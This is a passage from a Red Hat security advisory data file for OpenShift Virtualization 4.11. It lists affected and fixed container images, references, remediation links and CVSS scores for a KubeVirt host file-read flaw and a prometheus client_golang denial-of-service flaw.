"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-21698", cwe: { id: "CWE-772", name: "Missing Release of Resource after Effective Lifetime", }, discovery_date: "2022-01-19T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2045880", }, ], notes: [ { category: "description", text: "A denial of service attack was found in prometheus/client_golang. This flaw allows an attacker to produce a denial of service attack on an HTTP server by exploiting the InstrumentHandlerCounter function in the version below 1.11.1, resulting in a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a moderate impact for two main reasons. The opportunity for a Denial of Service is limited to the golang runtime. In the case of OpenShift Container Platform, this would be restricted within each individual container. Additionally, this is in alignment with upstream's (the Prometheus project) impact rating.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-21698", }, { category: "external", summary: "RHBZ#2045880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-21698", url: "https://www.cve.org/CVERecord?id=CVE-2022-21698", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", }, { category: "external", summary: "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", url: "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", }, ], release_date: "2022-02-15T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", 